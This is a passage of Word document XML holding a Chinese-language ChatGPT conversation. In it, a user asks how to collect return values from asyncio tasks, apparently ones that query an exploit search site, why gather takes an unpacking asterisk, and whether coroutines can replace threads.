        <w:t xml:space="preserve">    task = asyncio.create_task(foo())  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> foo() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6C3D0C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await task  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等待</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> foo() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协程完成，并获取其返回值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756EA83C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(result)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打印</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'hello'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3138EC73" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FD3CBEB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>asyncio.run(main())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B42F5E7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42E05863" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个示例中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">foo() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个协程函数，它在等待</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>秒后返回一个字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'hello'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">main() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>另一个协程函数，它使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.create_task() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> foo() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协程，并使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取其返回值。最后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncio.run(main()) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> main() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ABB405" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D25E66D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>task_list = [ querySploitus(url=url, data_offset=10*x) for x in range(0,10) ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1205CFCC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>loop = asyncio.get_event_loop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040183AE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>loop.run_until_complete(asyncio.wait(task_list))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种方式写的代码如何获取携程的返回值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49255106" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A23077" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="642A248A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio.wait(tasks)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tuple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，包含两个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型的对象，一个包含完成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Futures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，另一个包含未完成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Futures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。完成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Futures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是我们关注的，可以通过调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>result()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法获取他们的返回值。在你的例子中，你可以这样操作：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC89DC5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E596E07" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DEC5C2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>task_list = [ querySploitus(url=url, data_offset=10*x) for x in range(0,10) ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58555454" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>loop = asyncio.get_event_loop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9104D6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>done, _ = loop.run_until_complete(asyncio.wait(task_list))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42737C47" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63739744" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>results = [task.result() for task in done]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647F05FC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78157F2B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在上面的代码中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，它包含所有完成的任务。然后，我们使用列表解析（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>list comprehension</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来获取所有任务的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBC80AA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39A0F743" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然而，你还可以用更简单的方式来获取任务的结果，那就是使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio.gather(*tasks)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，它将返回一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Future</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Future</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的结果是所有任务的结果的一个列表。如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3AA8C4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="386968D4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE77025" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>task_list = [ querySploitus(url=url, data_offset=10*x) for x in range(0,10) ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC62132" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>loop = asyncio.get_event_loop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF44843" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>results = loop.run_until_complete(asyncio.gather(*task_list))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C852F04" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C69B640" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个代码中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>results</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个列表，包含了所有任务的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E816A3A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D4F6A7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>task_list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前面为什么要写一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36075EBA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C9DB4A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01EE77EF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，星号（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）有两种常见的用法：在函数定义中用于接收任意数量的位置参数（称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可变长度参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），在函数调用中用于将列表、元组或其他可迭代对象解包为位置参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347BBB54" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09CE6581" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在你的例子中：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E18C421" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2728FDA8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A97DD70" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>results = loop.run_until_complete(asyncio.gather(*task_list))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F16EF7F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DEEC4DD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>这里的星号是用于解包的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>task_list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个列表，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio.gather(*tasks)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接受的是多个任务（多个参数），而不是一个列表。星号将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>task_list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列表解包为多个参数，传递给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio.gather</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C031114" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CB2E7FC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你不使用星号，就像这样：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367A7F78" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1478FF08" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DC809F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>results = loop.run_until_complete(asyncio.gather(task_list))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263EF568" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58595F9D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.gather </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将会收到一个参数，这个参数是一个列表。这将导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.gather </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尝试并发运行这个列表，而不是列表中的任务。这将导致错误，因为列表本身不是一个任务或协程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B5DE4A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="171DB3B9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此，你需要使用星号将列表解包为多个参数，这样</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.gather </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就可以接收到多个任务，将它们并发运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698476FA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D54C8F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>携程是不是可以代替多线程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E6C778" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7EFEF0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69072DCD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协程（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>coroutine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和多线程都是实现程序并发的方法，但它们有一些重要的区别，并不总是可以互相替代。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537511F9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D3F6B00" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
